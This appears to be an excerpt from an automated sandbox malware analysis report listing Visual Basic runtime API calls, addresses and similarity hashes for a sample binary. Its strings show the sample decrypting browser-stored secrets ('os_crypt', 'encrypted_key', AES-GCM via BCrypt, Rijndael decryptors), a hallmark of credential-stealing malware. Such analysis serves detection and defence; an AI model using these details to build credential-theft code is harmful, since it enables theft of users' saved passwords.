                                                          • __vbaI4Var.MSVBVM60(00000000), ref: 0041BCB9
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000), ref: 0041BCCF
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0041BCE5
                                                          • __vbaVarMul.MSVBVM60(?,00000002,?), ref: 0041BD65
                                                          • __vbaI2Var.MSVBVM60(00000000), ref: 0041BD6C
                                                          • __vbaVarMul.MSVBVM60(?,00000002,?,00000003), ref: 0041BDA5
                                                          • __vbaVarSub.MSVBVM60(?,00000000), ref: 0041BDB3
                                                          • __vbaVarAdd.MSVBVM60(?,00000002,00000000), ref: 0041BDC8
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042EE3E
                                                            • Part of subcall function 0042ECB0: __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042EE6E
                                                            • Part of subcall function 0042ECB0: __vbaVarVargNofree.MSVBVM60 ref: 0042EE8F
                                                            • Part of subcall function 0042ECB0: __vbaVarSub.MSVBVM60(?,00000002,00000000), ref: 0042EE9E
                                                            • Part of subcall function 0042ECB0: __vbaI2Var.MSVBVM60(00000000), ref: 0042EEA5
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF2B
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF4E
                                                            • Part of subcall function 0042ECB0: __vbaVarIndexLoad.MSVBVM60(?,?,00000001), ref: 0042EF76
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF86
                                                            • Part of subcall function 0042ECB0: __vbaVarIndexStore.MSVBVM60(00000000,00000001), ref: 0042EFA9
                                                          • __vbaFreeVar.MSVBVM60(00006011,?,00006011,00000000,00000000), ref: 0041BDF6
                                                          • __vbaUI1I2.MSVBVM60 ref: 0041BE12
                                                          • __vbaUI1I2.MSVBVM60 ref: 0041BE27
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041BE66
                                                            • Part of subcall function 0041C100: __vbaUbound.MSVBVM60(00000001,?,004019D0,-00000001,6D4FEC2C), ref: 0041C17A
                                                            • Part of subcall function 0041C100: __vbaUI1I2.MSVBVM60(?,004019D0,-00000001,6D4FEC2C), ref: 0041C182
                                                            • Part of subcall function 0041C100: __vbaAryCopy.MSVBVM60(?,00401AA8,?,004019D0,-00000001,6D4FEC2C), ref: 0041C190
                                                            • Part of subcall function 0041C100: __vbaFreeVar.MSVBVM60(0041C3EE), ref: 0041C3DA
                                                            • Part of subcall function 0041C100: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C3E2
                                                            • Part of subcall function 0041C100: __vbaFreeVar.MSVBVM60 ref: 0041C3EB
                                                          • __vbaRecAssign.MSVBVM60(004050BC,?,?,?), ref: 0041BE91
                                                          • __vbaAryCopy.MSVBVM60(?,?), ref: 0041BEB3
                                                          • #698.MSVBVM60(?,?), ref: 0041BEE4
                                                          • __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 0041BEFF
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041BF06
                                                          • __vbaStrMove.MSVBVM60 ref: 0041BF11
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041BF27
                                                          • __vbaStrVarVal.MSVBVM60(?,?,00405638,00000001,000000FF,00000000), ref: 0041BF6F
                                                          • #712.MSVBVM60(?,00000000), ref: 0041BF7A
                                                          • __vbaStrMove.MSVBVM60 ref: 0041BF85
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041BF91
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?,0041C0D7), ref: 0041BFFE
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C010
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C022
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C034
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C046
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C055
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041C05E
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C06D
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C079
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041C082
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C091
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C0A0
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041C0A9
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C0B5
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C0C4
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041C0D0
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0041C0ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Destruct$Free$Move$Copy$Chkstk$Assign$ErrorUbound$IndexList$#631#698#712BstrLoadNofreeOverflowRedimStoreVarg
                                                          • String ID: (
                                                          • API String ID: 3448099741-3887548279
                                                          • Opcode ID: 372140f08f9110ff51498c2efa7867ff54b94c95a344d1a0f8c53bcfddb587c8
                                                          • Instruction ID: 9c946a5c36d8e76db4a453bad724209bbb6818a340ec16e979af2b719301cd18
                                                          • Opcode Fuzzy Hash: 372140f08f9110ff51498c2efa7867ff54b94c95a344d1a0f8c53bcfddb587c8
                                                          • Instruction Fuzzy Hash: 0622FCB1901259EFDB14DFA0DE88BEEBBB4FB48304F108199E14AB7151DB741A88CF55
                                                          APIs
                                                          • #644.MSVBVM60(AES,6D4245C1,00000000,($@), ref: 0042C4EA
                                                          • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 0042C501
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042C510
                                                          • #644.MSVBVM60(ChainingMode), ref: 0042C520
                                                          • #644.MSVBVM60(ChainingModeGCM), ref: 0042C52A
                                                          • __vbaSetSystemError.MSVBVM60(?,?,00000000,00000020,00000000), ref: 0042C53F
                                                          • __vbaAryLock.MSVBVM60(?), ref: 0042C553
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042C572
                                                          • #644.MSVBVM60(00000000), ref: 0042C594
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 0042C5A2
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 0042C5AE
                                                          • __vbaSetSystemError.MSVBVM60(?,?,00000000,00000000,00000000,-00000001,?,00000000), ref: 0042C5D2
                                                          • __vbaAryLock.MSVBVM60(?,?,?,00000000), ref: 0042C5F8
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,00000000), ref: 0042C617
                                                          • #644.MSVBVM60(00000000,?,?,00000000), ref: 0042C633
                                                          • __vbaAryUnlock.MSVBVM60(?,?,?,00000000), ref: 0042C63B
                                                          • __vbaSetSystemError.MSVBVM60(?), ref: 0042C814
                                                          • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0042C824
                                                          • __vbaFreeStr.MSVBVM60(0042C84A), ref: 0042C843
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$#644System$BoundsGenerateLockUnlock$CopyFreeUbound
                                                          • String ID: ($@$@$AES$BCryptOpenAlgorithmProvider$ChainingMode$ChainingModeGCM
                                                          • API String ID: 254650619-520117607
                                                          • Opcode ID: 883f4903e4fc28569d65dd1089cd8e235f438f38af8bfe614b31c9d891ce6949
                                                          • Instruction ID: 0ec7adf32517d4817a3f048ae053f653f8606d26ef8940e0aedf8418c99413eb
                                                          • Opcode Fuzzy Hash: 883f4903e4fc28569d65dd1089cd8e235f438f38af8bfe614b31c9d891ce6949
                                                          • Instruction Fuzzy Hash: 32C12C74E003199FCB14DFA4D9C4AAEB7B9FF49304F60852AE905AB350DB75A841CF98
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0041B2AE
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6), ref: 0041B2DE
                                                          • #716.MSVBVM60(?,System.Security.Cryptography.RijndaelManaged,00000000,?,?,?,00000000,004030D6), ref: 0041B2FD
                                                          • __vbaVarSetVar.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 0041B30B
                                                          • __vbaChkstk.MSVBVM60 ref: 0041B32E
                                                          • __vbaVarLateMemSt.MSVBVM60(?,keySize), ref: 0041B358
                                                          • __vbaChkstk.MSVBVM60 ref: 0041B37B
                                                          • __vbaVarLateMemSt.MSVBVM60(?,Padding), ref: 0041B3A5
                                                          • __vbaChkstk.MSVBVM60 ref: 0041B3C8
                                                          • __vbaVarLateMemSt.MSVBVM60(?,Mode), ref: 0041B3F2
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041B407
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041B41B
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041B429
                                                          • __vbaStrMove.MSVBVM60 ref: 0041B448
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0041B460
                                                            • Part of subcall function 0041B6F0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 0041B733
                                                            • Part of subcall function 0041B6F0: __vbaLenBstr.MSVBVM60(?,00000000,00000000,00000000,00000000), ref: 0041B742
                                                            • Part of subcall function 0041B6F0: __vbaSetSystemError.MSVBVM60(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0041B758
                                                            • Part of subcall function 0041B6F0: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 0041B784
                                                            • Part of subcall function 0041B6F0: #644.MSVBVM60(00000000), ref: 0041B790
                                                            • Part of subcall function 0041B6F0: __vbaAryLock.MSVBVM60(?,?), ref: 0041B79C
                                                            • Part of subcall function 0041B6F0: __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B7BB
                                                            • Part of subcall function 0041B6F0: __vbaLenBstr.MSVBVM60(?,00000000,?,00000000,00000000), ref: 0041B7E2
                                                            • Part of subcall function 0041B6F0: __vbaSetSystemError.MSVBVM60(0000FDE9,00000000,00000000,00000000), ref: 0041B7F6
                                                            • Part of subcall function 0041B6F0: __vbaAryUnlock.MSVBVM60(?), ref: 0041B800
                                                          • __vbaChkstk.MSVBVM60(?), ref: 0041B47E
                                                          • __vbaVarLateMemSt.MSVBVM60(?,Key,?), ref: 0041B4A5
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041B4C1
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,00000000,004030D6), ref: 0041B4CD
                                                          • __vbaVarLateMemCallLd.MSVBVM60(?,?,CreateDecryptor,00000000,?,?,?,?,00000000,004030D6), ref: 0041B4F0
                                                          • __vbaVarSetVar.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 0041B4FE
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 0041B53E
                                                          • __vbaChkstk.MSVBVM60 ref: 0041B562
                                                          • __vbaChkstk.MSVBVM60 ref: 0041B588
                                                          • __vbaChkstk.MSVBVM60 ref: 0041B5B7
                                                          • __vbaVarLateMemCallLd.MSVBVM60(?,?,TransformFinalBlock,00000003), ref: 0041B5F0
                                                          • __vbaVar2Vec.MSVBVM60(?,00000000), ref: 0041B5FE
                                                          • __vbaAryMove.MSVBVM60(?,?), ref: 0041B60C
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041B615
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0041B628
                                                            • Part of subcall function 0042E8C0: __vbaStrCopy.MSVBVM60(6D42D8B1,00000000,00000000), ref: 0042E902
                                                            • Part of subcall function 0042E8C0: __vbaGenerateBoundsError.MSVBVM60 ref: 0042E941
                                                            • Part of subcall function 0042E8C0: __vbaStrUI1.MSVBVM60(?), ref: 0042E95A
                                                            • Part of subcall function 0042E8C0: __vbaStrMove.MSVBVM60 ref: 0042E965
                                                            • Part of subcall function 0042E8C0: __vbaStrCmp.MSVBVM60(0040796C,00000000), ref: 0042E96D
                                                            • Part of subcall function 0042E8C0: __vbaFreeStr.MSVBVM60 ref: 0042E980
                                                            • Part of subcall function 0042E8C0: __vbaGenerateBoundsError.MSVBVM60 ref: 0042E9B7
                                                            • Part of subcall function 0042E8C0: #608.MSVBVM60(?,00000000), ref: 0042E9D6
                                                            • Part of subcall function 0042E8C0: __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 0042E9E8
                                                            • Part of subcall function 0042E8C0: __vbaStrVarMove.MSVBVM60(00000000), ref: 0042E9EF
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0041B649
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0041B6CC), ref: 0041B6A7
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041B6B0
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041B6BC
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041B6C5
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0041B6E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Chkstk$Error$Late$Bstr$BoundsCopyGenerate$#516#608#631#644CallDestructListSystemUbound$#537#632#716LockOverflowRedimUnlockVar2
                                                          • String ID: 03232A13323A390411150D2E291A3B18$CreateDecryptor$Key$Mode$Padding$System.Security.Cryptography.RijndaelManaged$TransformFinalBlock$keySize$lkGLiBCJraodCFhSsSyLssH
                                                          • API String ID: 2183829440-3496722723
                                                          • Opcode ID: b7be1e0d36a248b2c2fa9d1a1faaec0d50a151d1bc0f0b5491b987813e270084
                                                          • Instruction ID: f19a22bf987f14454c8906640cef14a2538f408df6e713c948ff2376e9f49332
                                                          • Opcode Fuzzy Hash: b7be1e0d36a248b2c2fa9d1a1faaec0d50a151d1bc0f0b5491b987813e270084
                                                          • Instruction Fuzzy Hash: 29C1E4B4900209DFDB14DFA4C949BDDBBB4FF48304F1082AAE509AB391DB75AA85CF54
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6,?,?,?,?,0042C113,00000000), ref: 0042C88E
                                                          • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,?,004030D6), ref: 0042C8BE
                                                          • __vbaStrCopy.MSVBVM60(?,00000000,?,?,004030D6), ref: 0042C8D3
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?,?,00000000,?,?,004030D6), ref: 0042C8E7
                                                          • __vbaStrCopy.MSVBVM60(?,00000000,?,?,004030D6), ref: 0042C8F5
                                                          • __vbaStrMove.MSVBVM60 ref: 0042C914
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0042C932
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0042C939
                                                          • __vbaStrMove.MSVBVM60 ref: 0042C944
                                                            • Part of subcall function 0042CCD0: __vbaChkstk.MSVBVM60(?,004030D6,?,?,00000000,?,?,004030D6), ref: 0042CCEE
                                                            • Part of subcall function 0042CCD0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,?,004030D6), ref: 0042CD1E
                                                            • Part of subcall function 0042CCD0: #645.MSVBVM60(00004008,00000000), ref: 0042CD3E
                                                            • Part of subcall function 0042CCD0: __vbaStrMove.MSVBVM60 ref: 0042CD49
                                                            • Part of subcall function 0042CCD0: __vbaLenBstrB.MSVBVM60(00000000), ref: 0042CD50
                                                            • Part of subcall function 0042CCD0: __vbaFreeStr.MSVBVM60 ref: 0042CD66
                                                            • Part of subcall function 0042CCD0: #648.MSVBVM60(0000000A), ref: 0042CD91
                                                            • Part of subcall function 0042CCD0: __vbaFreeVar.MSVBVM60 ref: 0042CD9E
                                                            • Part of subcall function 0042CCD0: __vbaFileOpen.MSVBVM60(00000020,000000FF,?,00000000), ref: 0042CDBA
                                                            • Part of subcall function 0042CCD0: #570.MSVBVM60(?), ref: 0042CDCC
                                                            • Part of subcall function 0042CCD0: #525.MSVBVM60(00000000), ref: 0042CDD3
                                                            • Part of subcall function 0042CCD0: __vbaStrMove.MSVBVM60 ref: 0042CDDE
                                                            • Part of subcall function 0042CCD0: __vbaGet3.MSVBVM60(00000000,00000000,?), ref: 0042CDF6
                                                            • Part of subcall function 0042CCD0: __vbaFileClose.MSVBVM60(?), ref: 0042CE08
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0042C958
                                                            • Part of subcall function 0042F9E0: __vbaChkstk.MSVBVM60(00000000,004030D6,?,?,00000000,?,?,004030D6), ref: 0042F9FE
                                                            • Part of subcall function 0042F9E0: __vbaStrCopy.MSVBVM60(?,00000000), ref: 0042FA44
                                                            • Part of subcall function 0042F9E0: __vbaOnError.MSVBVM60(000000FF,?,00000000), ref: 0042FA53
                                                            • Part of subcall function 0042F9E0: #632.MSVBVM60(?,00004008,00000001,00000002), ref: 0042FA9F
                                                            • Part of subcall function 0042F9E0: __vbaVarMove.MSVBVM60 ref: 0042FAAB
                                                            • Part of subcall function 0042F9E0: __vbaFreeVar.MSVBVM60 ref: 0042FAB4
                                                            • Part of subcall function 0042F9E0: __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0042FAD7
                                                            • Part of subcall function 0042F9E0: __vbaObjSet.MSVBVM60(00000000,00000000,?,00000001), ref: 0042FAFD
                                                            • Part of subcall function 0042F9E0: __vbaFreeVar.MSVBVM60(0042FB9F), ref: 0042FB98
                                                          • __vbaObjSet.MSVBVM60(?,00000000,?), ref: 0042C96C
                                                          • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,00000000), ref: 0042C990
                                                          • __vbaObjIs.MSVBVM60(?,00000000,?,?,?,?,00000000,?,?,004030D6), ref: 0042C9A6
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,?,?,004030D6), ref: 0042C9C8
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000,?,?,?,?,00000000,?,?,004030D6), ref: 0042C9D4
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,?,?,004030D6), ref: 0042C9EB
                                                          • __vbaChkstk.MSVBVM60 ref: 0042CA31
                                                          • __vbaChkstk.MSVBVM60(Item,00000001), ref: 0042CA67
                                                          • __vbaLateMemCallLd.MSVBVM60(?,?,Item,00000001,Item,00000001), ref: 0042CA9A
                                                          • __vbaVarLateMemCallLd.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042CAA8
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0042CAB2
                                                          • __vbaStrMove.MSVBVM60 ref: 0042CABD
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042CACD
                                                          • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,00000000,?,?,004030D6), ref: 0042CAF7
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000,?,?,?,?,00000000,?,?,004030D6), ref: 0042CB0C
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,00000000,00000011,00000001,-00000005,?,?,?,?,00000000,?,?,004030D6), ref: 0042CB2B
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0042CB41
                                                          • __vbaFreeVar.MSVBVM60(00006011,00000005,00006011,00000000,00000003), ref: 0042CBB7
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042CBC9
                                                          • __vbaAryMove.MSVBVM60(?,?,?,?,00000000,00000000,00000004,00000000), ref: 0042CBF5
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042CBFE
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042CCAE), ref: 0042CC65
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042CC74
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042CC80
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042CC89
                                                          • __vbaFreeObj.MSVBVM60 ref: 0042CC92
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042CC9E
                                                            • Part of subcall function 00432300: __vbaStrCopy.MSVBVM60(6D51C2DA,00008008), ref: 00432339
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$ChkstkCopy$BstrDestruct$ErrorList$#516#631#632CallFileLateUbound$#525#537#570#608#645#648CloseGet3OpenRedim
                                                          • String ID: 260F002516006F1838022608$Item$encrypted_key$os_crypt$ozCoFwlOKLcRmecFWpLTtuxSeDlWViCWz
                                                          • API String ID: 676153682-3451917358
                                                          • Opcode ID: dcaa2bf406cac54e3a72378371b563db0a58a20fd04280cf107219ca44a10f55
                                                          • Instruction ID: e189bd2c2074f57eec86499cefa1468d7c2627c00626a82b59dd18930deab3e7
                                                          • Opcode Fuzzy Hash: dcaa2bf406cac54e3a72378371b563db0a58a20fd04280cf107219ca44a10f55
                                                          • Instruction Fuzzy Hash: 88C1F971900218EBDB04DFA4DD89BDEBBB9FF44305F108169E10AB72A0DB745A89CF58
                                                          APIs
